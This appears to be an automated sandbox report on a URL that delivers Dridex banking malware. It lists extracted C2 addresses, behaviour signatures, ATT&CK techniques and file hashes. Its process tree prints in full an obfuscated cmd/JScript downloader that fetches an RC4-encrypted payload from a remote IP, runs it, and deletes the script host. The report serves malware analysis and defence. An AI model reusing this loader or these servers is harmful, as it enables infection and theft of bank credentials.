Analysis

  • max time kernel
    120s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10-ja-20210920
  • submitted
    07-10-2021 13:40

General

  • Target

    https://ankltrafficexit.xyz/trafficexit

  • Sample

    211007-qynqkscfgp

Malware Config

Extracted

Family

dridex

Botnet

10111

C2

184.168.147.173:6225

212.112.86.37:9676

72.52.96.202:8194

rc4.plain
rc4.plain

Signatures

  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

  • Registers COM server for autorun 1 TTPs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 30 IoCs
  • Modifies registry class 44 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://ankltrafficexit.xyz/trafficexit
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2268
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2268 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2884
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://188.227.84.6/?MjI1NzM1&umB&sdfsdfdfg=arena&fhfghddfsdf=shuffle&dsfdffg43t=6NbP0zYA0SD2I3fz-3ORZzxOWPPk7HPRAOzrl-CelqA8fAkLOcFaQLh2UaJeAYzyIpfBlhB_qCu20LcwRHKhJaC9UeNUQtM96LIVLM46A&cxssdvxcv=81hvelo.73fr59.406r8n8n0&ogfgafgn4=w3zQMvXcJxzQFYPJKfncT&WUcOzucJsMTgwOTc=" "2""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2816
        • C:\Windows\SysWOW64\wscript.exe
          wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://188.227.84.6/?MjI1NzM1&umB&sdfsdfdfg=arena&fhfghddfsdf=shuffle&dsfdffg43t=6NbP0zYA0SD2I3fz-3ORZzxOWPPk7HPRAOzrl-CelqA8fAkLOcFaQLh2UaJeAYzyIpfBlhB_qCu20LcwRHKhJaC9UeNUQtM96LIVLM46A&cxssdvxcv=81hvelo.73fr59.406r8n8n0&ogfgafgn4=w3zQMvXcJxzQFYPJKfncT&WUcOzucJsMTgwOTc=" "2""
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:988
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c s6dh3.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1804
            • C:\Users\Admin\AppData\Local\Temp\s6dh3.exe
              s6dh3.exe
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              PID:1060
  • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.180.0905.0007\FileSyncConfig.exe
    "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.180.0905.0007\FileSyncConfig.exe"
    1⤵
    • Modifies registry class
    PID:2332

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\0G36SWQF.cookie
    MD5

    75e668ef6f9567717278522bb2aca7aa

    SHA1

    962783ee90d76fdb1df66950e4bc6fbc1c5ba4a4

    SHA256

    cbaa049fc7b8a1203b7aba4dd08af63aac12511d2ec4471d8259cdfb05b0d36f

    SHA512

    49eddc92d30303a79ee3d9e8651f39c31db1615a96c208d2d14a53860f1a258759611e76e66e9c994fb15c26aa85947eb717e86559c7def35cac704206dcf9eb

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\WNSVY52Z.cookie
    MD5

    63239f1dd41e955c09e5f9dab180a6a7

    SHA1

    e28228ff3d25cc9b6016b45772e6936772c4946a

    SHA256

    38bb1bf7f74a03ab16569b84e9ab6cb7b932f97cae485efd3816a7c7bc0ebdb9

    SHA512

    22e2605be193bfd6dde99d2e73e77dc9e688365cb69cb3a9dec41b19d483f2e2eb712a41d16bca390f08f88407f382e563baab450927c08759b496749d9e6e78

  • C:\Users\Admin\AppData\Local\Temp\3.tMp
    MD5

    60fc00422b399db85f87d41b8328976d

    SHA1

    bb85034acad8025f97e5bb236443debaf8926e4b

    SHA256

    c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690

    SHA512

    16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151

  • C:\Users\Admin\AppData\Local\Temp\s6dh3.exe
    MD5

    180e683c3799142585055ee224b7c25c

    SHA1

    c8f21d45604849300c696d4964cb53472b37ef85

    SHA256

    fcc960a3ef036d543343647c38c9b90fac965ce6158e7d1f246ba457972f65c6

    SHA512

    c07cc11db3f8fcf39773e548e852694871a6479a66c45230322708e1177532647fa9db58b9edd06278192f7877ffd3aac7ce5a462f6019df850d324a60c583d2

  • C:\Users\Admin\AppData\Local\Temp\s6dh3.exe
    MD5

    180e683c3799142585055ee224b7c25c

    SHA1

    c8f21d45604849300c696d4964cb53472b37ef85

    SHA256

    fcc960a3ef036d543343647c38c9b90fac965ce6158e7d1f246ba457972f65c6

    SHA512

    c07cc11db3f8fcf39773e548e852694871a6479a66c45230322708e1177532647fa9db58b9edd06278192f7877ffd3aac7ce5a462f6019df850d324a60c583d2

  • memory/988-182-0x0000000000000000-mapping.dmp
  • memory/1060-185-0x0000000000000000-mapping.dmp
  • memory/1060-189-0x0000000000400000-0x0000000000462000-memory.dmp
    Filesize

    392KB

  • memory/1060-188-0x00000000004F0000-0x000000000059E000-memory.dmp
    Filesize

    696KB

  • memory/1804-184-0x0000000000000000-mapping.dmp
  • memory/2268-144-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-151-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-124-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-125-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-127-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-128-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-129-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-131-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-132-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-133-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-134-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-136-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-137-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-138-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-142-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-141-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-121-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-145-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-147-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-150-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-149-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-123-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-155-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-156-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-157-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-163-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-164-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-166-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-169-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-170-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-172-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-173-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-175-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-122-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-120-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-119-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-117-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-116-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-115-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-177-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-178-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2268-179-0x00007FFE71A50000-0x00007FFE71ABB000-memory.dmp
    Filesize

    428KB

  • memory/2816-181-0x0000000000000000-mapping.dmp
  • memory/2884-140-0x0000000000000000-mapping.dmp